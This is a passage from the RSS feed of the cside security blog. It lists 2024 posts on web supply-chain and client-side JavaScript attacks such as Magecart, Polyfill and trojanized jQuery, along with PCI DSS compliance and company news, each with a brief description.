00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/why-developers-obfuscate-image-cover.webp" length="0" type="image/webp"/></item><item><title>ButterCMS unreported downtime and security concerns</title><link>https://cside.com/blog/buttercms-unreported-downtime-and-security-concerns</link><guid isPermaLink="true">https://cside.com/blog/buttercms-unreported-downtime-and-security-concerns</guid><description>ButterCMS is a popular tool used to manage content for blogs. Earlier this week, we noticed a potentially severe security incident which tri</description><pubDate>Mon, 23 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/buttercms-image-cover.webp" length="0" type="image/webp"/></item><item><title>cside raises a $6m seed round</title><link>https://cside.com/blog/cside-raises-a-6m-seed-round</link><guid isPermaLink="true">https://cside.com/blog/cside-raises-a-6m-seed-round</guid><description>We&apos;re incredibly proud to announce our seed round of $6m, just six months after raising our pre-seed of $1.7m. Led by Uncork Capital as the lead, with participation from Mantis and PrimeSet. We also welcome back Scribble VC and Roar Ventures who supported us in the pre-seed. Together with this news, we&apos;ve opened up our free tier to all. You can now sign up and start using cside to monitor, secure, and optimize 3rd party scripts. We founded cside to put client-side security on the map. For t</description><pubDate>Mon, 16 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/6-million-dollar-seed-round-image-cover.webp" length="0" type="image/webp"/></item><item><title>Cisco client-side Magecart JavaScript attack</title><link>https://cside.com/blog/cisco-client-side-magecart-javascript-attack</link><guid isPermaLink="true">https://cside.com/blog/cisco-client-side-magecart-javascript-attack</guid><description>Another day, another high-profile client-side JavaScript attack. This morning, we read that Cisco is the next victim of malicious code being</description><pubDate>Fri, 06 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/cisco-client-side-image-cover.webp" length="0" type="image/webp"/></item><item><title>cside picked for TechCrunch Disrupt Startup Battlefield 2024</title><link>https://cside.com/blog/cside-picked-for-techcrunch-disrupt-startup-battlefield-2024</link><guid isPermaLink="true">https://cside.com/blog/cside-picked-for-techcrunch-disrupt-startup-battlefield-2024</guid><description>We&apos;re incredibly proud to announce that we were selected for TechCrunch Disrupt Startup Battlefield in 2024. This year&apos;s Startup Battlefield participants span artificial intelligence (AI), software as a service (SaaS), fintech, security, sustainability, space exploration, and more. Out of thousands of startups, just 200 make the cut, and we are absolutely thrilled to be among this select group. We can not wait to share our product with the world, Oct. 28 - Wed, Oct. 30 at Moscone West in San F</description><pubDate>Thu, 05 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/CsideSelectedForTCDisrupt.webp" length="0" type="image/webp"/></item><item><title>How to speed up JavaScript</title><link>https://cside.com/blog/how-to-speed-up-javascript</link><guid isPermaLink="true">https://cside.com/blog/how-to-speed-up-javascript</guid><description>Conversion rates are correlated with site loading speeds. But e-commerce sites have a ton of JavaScript which slows things down... the solution is here.</description><pubDate>Mon, 02 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/how-to-speedup-javascript-image-cover.webp" length="0" type="image/webp"/></item><item><title>What are digital skimmers?</title><link>https://cside.com/blog/what-are-digital-skimmers</link><guid isPermaLink="true">https://cside.com/blog/what-are-digital-skimmers</guid><description>Recently, we read of a new significant cyberattack campaign that targeted hundreds of online stores, exploiting vulnerabilities in third-party scripts and plugins. This is a perfect example of a &apos;digital skimmer&apos;. Digital skimmers are snippets of code maliciously injected into legitimate websites. They target personal and credit card information. This problem is on the rise and is part of the reason cside was created. cside is able to detect this malicious code and prevent it from affecti</description><pubDate>Thu, 29 Aug 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/example-of-digital-skimmers-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Why browsers are becoming increasingly more dangerous</title><link>https://cside.com/blog/why-the-browsers-becomes-increasingly-more-dangerous</link><guid isPermaLink="true">https://cside.com/blog/why-the-browsers-becomes-increasingly-more-dangerous</guid><description>Technologies like WebAssembly (WASM), WebGPU, and IndexedDB have transformed what browsers can achieve. This evolution has expanded the func</description><pubDate>Fri, 23 Aug 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/why-browsers-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The true cost of a cyber attack</title><link>https://cside.com/blog/the-true-cost-of-a-cyber-attack</link><guid isPermaLink="true">https://cside.com/blog/the-true-cost-of-a-cyber-attack</guid><description>Calculating the true cost of a cyber attack is difficult. None are the same. Yet we report on this in as much detail as possible to accurately represent the full picture of when this happens to your business.</description><pubDate>Mon, 12 Aug 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-true-costs-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Is Tuaw a scam in the making?</title><link>https://cside.com/blog/is-tuaw-a-scam-in-the-making</link><guid isPermaLink="true">https://cside.com/blog/is-tuaw-a-scam-in-the-making</guid><description>When we saw the new Fireship video, we were reminded of the recent Polyfill attack. Our first article was picked up by cybersecurity news outlets.</description><pubDate>Fri, 02 Aug 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/TheCostOfACyberattack-1.jpg" length="0" type="image/jpeg"/></item><item><title>The Copay event-stream attack illustrates dependency risks</title><link>https://cside.com/blog/the-copay-event-stream-attack-illustrates-dependency-risks</link><guid isPermaLink="true">https://cside.com/blog/the-copay-event-stream-attack-illustrates-dependency-risks</guid><description>In November 2018, the JavaScript ecosystem was rattled by a sophisticated attack on Copay, a popular cryptocurrency wallet provider. Known as the event-stream attack, this incident exposed the risks of relying on third-party dependencies in software development. Copay is now known as Bitpay Wallet. Understanding the attack: Event-stream, a popular npm package, was widely used by numerous projects to manage streams</description><pubDate>Mon, 29 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/the-copay-event-stream-attack-dependency-risks.webp" length="0" type="image/webp"/></item><item><title>The Segway cyber attack explained</title><link>https://cside.com/blog/the-segway-cyber-attack-explained</link><guid isPermaLink="true">https://cside.com/blog/the-segway-cyber-attack-explained</guid><description>In January 2022, the Segway web store suffered a web supply chain attack - also often referred to as a Magecart attack. In these types of attacks, malicious JavaScript code is added that loads from the client-side, known as third-party scripts. Many common tools are third-party scripts. Things like analytics, captchas and more. But this avenue can also be used for malicious reasons, as was the case here. In this attack on Segway, their store is set up on Magento. The attackers targeted vulnera</description><pubDate>Thu, 25 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-segway-cyber-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Don&apos;t deploy scripts site-wide</title><link>https://cside.com/blog/dont-deploy-scripts-site-wide</link><guid isPermaLink="true">https://cside.com/blog/dont-deploy-scripts-site-wide</guid><description>Third-party scripts are often deployed site-wide, typically injected in the head tags in web frameworks like Next.js via the &apos;_document.js&apos; file. This widespread implementation, while convenient for developers and often recommended by onboarding guides, means these scripts run across the entire site. This is simpler to implement, but it also introduces security risks and performance issues that are often overlooked. The recent Kaiser Permanente data leak shows the dangers of having poorly manag</description><pubDate>Mon, 22 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/dont-deploy-scripts-site-wide.webp" length="0" type="image/webp"/></item><item><title>What is an attack vector and what are hidden ones</title><link>https://cside.com/blog/what-is-an-attack-vector-and-what-are-hidden-ones</link><guid isPermaLink="true">https://cside.com/blog/what-is-an-attack-vector-and-what-are-hidden-ones</guid><description>An attack vector in cybersecurity is the way an attacker takes advantage of security weaknesses. Some are more obscure than others. One that&apos;s been our focus is third-party JavaScript. Since these scripts are installed by the website owner yet executed in the visitors&apos; browsers, they&apos;re in a unique position. If something malicious occurs within these scripts, neither party is aware. The visitor is affected, and the website owner becomes liable. We&apos;ve seen this too many times, for example, the</description><pubDate>Mon, 15 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/what-is-an-attack-vector-and-hidden-ones.webp" length="0" type="image/webp"/></item><item><title>Web supply chain attack through trojanized jQuery on npm, GitHub and CDNs</title><link>https://cside.com/blog/web-supply-chain-attack-through-trojanized-jquery-on-npm-github-and-cdns</link><guid isPermaLink="true">https://cside.com/blog/web-supply-chain-attack-through-trojanized-jquery-on-npm-github-and-cdns</guid><description>Attacks have been found in trojanized jQuery on GitHub, npm and jsDelivr in a new web supply chain attack. Each package had a copy of jQuery</description><pubDate>Tue, 09 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/size/w1000/2024/11/MaliciousScriptOnJsDelivr-cside.dev.webp" length="0" type="image/webp"/></item><item><title>How expired domains lead to cyber attacks</title><link>https://cside.com/blog/how-expired-domains-lead-to-cyber-attacks</link><guid isPermaLink="true">https://cside.com/blog/how-expired-domains-lead-to-cyber-attacks</guid><description>In 2018, British Airways was attacked through the exploitation of a third-party JavaScript package running on its site.</description><pubDate>Mon, 08 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/how-expired-domains-lead-to-cyber-attacks.webp" length="0" type="image/webp"/></item><item><title>The Polyfill attack explained</title><link>https://cside.com/blog/the-polyfill-attack-explained</link><guid isPermaLink="true">https://cside.com/blog/the-polyfill-attack-explained</guid><description>A tampered JavaScript file injected by the polyfill[.]io domain redirected a percentage of users to adult and betting websites based on their User-Agent. A Japanese X user &quot;piyokango&quot; was likely the first to report his attack on the 24th of June.</description><pubDate>Wed, 03 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-polyfill-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>What Is a Supply Chain Attack? The Browser Supply Chain Explained</title><link>https://cside.com/blog/what-is-the-browser-supply-chain</link><guid isPermaLink="true">https://cside.com/blog/what-is-the-browser-supply-chain</guid><description>cside is a cybersecurity product that lives in the browser supply chain space. We and other vendors operating here like to talk about that supply chain. But, what exactly do we mean by it? The browser supply chain is the combination of components and processes that come together to render web pages, execute scripts, and ensure smooth functionality. This supply chain includes everything from the initial request for a webpage to the final rendering of that page in a user&apos;s browser. As well as dyn</description><pubDate>Tue, 02 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/what-is-the-browser-supply-chain.webp" length="0" type="image/webp"/></item><item><title>More than 490k websites targeted in web supply chain attack</title><link>https://cside.com/blog/more-than-100k-websites-targeted-in-web-supply-chain-attack</link><guid isPermaLink="true">https://cside.com/blog/more-than-100k-websites-targeted-in-web-supply-chain-attack</guid><description>The cdn.polyfill[.]io domain is being used in a web supply chain attack. We were first to report the real scale: more than 490,000 affected websites.</description><pubDate>Tue, 25 Jun 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/more-than-490k-websites-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The BrowseAloud Supply-Chain Attack: A Case Study in Cryptojacking</title><link>https://cside.com/blog/the-browsealoud-supply-chain-attack-a-case-study-in-cryptojacking</link><guid isPermaLink="true">https://cside.com/blog/the-browsealoud-supply-chain-attack-a-case-study-in-cryptojacking</guid><description>This attack affected more than 4,000 websites, including government and educational sites, exposing thousands of users to cryptojacking without their knowledge.</description><pubDate>Mon, 10 Jun 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/the-browsealoud-supply-chain-attack-cryptojacking.webp" length="0" type="image/webp"/></item><item><title>Supply Chain Risk Doesn&apos;t End At NPM</title><link>https://cside.com/blog/supply-chain-attacks-doesnt-end-at-npm</link><guid isPermaLink="true">https://cside.com/blog/supply-chain-attacks-doesnt-end-at-npm</guid><description>By only checking NPM (or another registry), you&apos;re not protected from attacks through third-party scripts.</description><pubDate>Thu, 30 May 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/ClientSideSecurityIsNotJustNPM.jpg" length="0" type="image/jpeg"/></item><item><title>Ticketmaster Data Breach Déjà Vu: What You Need to Know</title><link>https://cside.com/blog/ticketmaster-data-breach-deja-vu-what-you-need-to-know</link><guid isPermaLink="true">https://cside.com/blog/ticketmaster-data-breach-deja-vu-what-you-need-to-know</guid><description>Yesterday on May 29, 2024, news broke of an alleged data breach involving Ticketmaster, a prominent ticket sales and distribution company. Ticketmaster has confirmed unauthorized activity within a third-party cloud database environment, claiming to have exposed the personal information of over 500 million customers. This breach includes sensitive data such as emails, phone numbers, addresses, and financial details. ShinyHunters, a notorious attacker, reposted the breach . According to reports,</description><pubDate>Thu, 30 May 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/TicketmasterAttack.jpg" length="0" type="image/jpeg"/></item><item><title>Kaiser Permanente Data Leak: A Case of Miscommunication and Inadequate Disclosure</title><link>https://cside.com/blog/kaiser-permanente-data-leak-a-case-of-miscommunication-and-inadequate-disclosure</link><guid isPermaLink="true">https://cside.com/blog/kaiser-permanente-data-leak-a-case-of-miscommunication-and-inadequate-disclosure</guid><description>On April 29th, healthcare giant Kaiser Permanente disclosed a data leak impacting 13.4 million current and former insurance members. The incident was rooted in improperly managed 3rd party scripts. The Incident Kaiser Permanente used tracking codes to monitor how its members navigated through its website and mobile applications. Some of these pages contained sensitive healthcare data, leading to the 3rd party scripts inadvertently transmitted information to third-party vendors they weren&apos;t</description><pubDate>Sat, 25 May 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/KaiserPermanenteBreach.jpg" length="0" type="image/jpeg"/></item><item><title>Threat Feeds In The AI Era</title><link>https://cside.com/blog/are-threat-feeds-still-good-in-2024</link><guid isPermaLink="true">https://cside.com/blog/are-threat-feeds-still-good-in-2024</guid><description>The idea behind threat feeds is valid. But, we&apos;d argue it&apos;s past its prime at this point. And with where technology is today, there are better options. Threat feeds are (often) a list of community-sourced security information. When someone notices a vulnerability, they&apos;ll put out a notice to the thread feed manually. It then gets picked up, and featured in the feed where security folk at their respective companies read it and check their own systems to see if they are prone to potential danger.</description><pubDate>Sun, 28 Apr 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/threat-feeds-2024-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The 2021 cdnjs Vulnerability in Detail</title><link>https://cside.com/blog/the-2021-cdnjs-vulnerability</link><guid isPermaLink="true">https://cside.com/blog/the-2021-cdnjs-vulnerability</guid><description>Verifying that your 3rd party script sources are reputable is important. But that alone may not be enough. That&apos;s what the world learned in 2021, when a massive vulnerability in Cloudlfare&apos;s cdnjs was flagged. Here&apos;s the rundown of what, and how, it happened. Cdnjs is one of the most commonly used JavaScript Content Delivery Networks (CDNs) of today. Over 12% of all websites on the internet inject at least one script through cdnjs. A researcher with the screen name &apos;RyotaK&apos; shared a supply cha</description><pubDate>Sun, 28 Apr 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/CDNJSVulnerability.jpg" length="0" type="image/jpeg"/></item><item><title>The risk of only protecting your payment portals from 3rd party javascript attacks</title><link>https://cside.com/blog/the-risk-of-only-protecting-your-payment-portals</link><guid isPermaLink="true">https://cside.com/blog/the-risk-of-only-protecting-your-payment-portals</guid><description>PCI DSS 4.0 is here. By March 2025, it mandates that payment portals need to have a way to authorize each script on payment pages. Websites need to maintain an inventory of all scripts (on those payment portals at least) and ensure their integrity. You now need to detect and respond to unauthorized modifications on payment pages, including changes to HTTP headers and page contents. Organizations must check these configurations at least once every seven days or as determined by their risk analysi</description><pubDate>Mon, 15 Apr 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/dont-just-protect-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>PCI DSS Compliance Software for 4.0.1 (Complete Guide)</title><link>https://cside.com/blog/pci-dss-compliance-software</link><guid isPermaLink="true">https://cside.com/blog/pci-dss-compliance-software</guid><description>How PCI DSS compliance software helps merchants meet 4.0.1, including requirement 6.4.3 script inventory and 11.6.1 tamper detection. Comparison of leading platforms and buyer criteria.</description><pubDate>Mon, 04 Mar 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/11/PCI-DSS-4.0.1-Complete-Guide---Steps.png" length="0" type="image/png"/></item></channel></rss>